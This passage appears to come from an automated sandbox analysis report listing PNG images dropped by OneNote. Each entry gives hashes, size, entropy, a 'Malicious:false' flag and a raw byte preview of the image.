                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
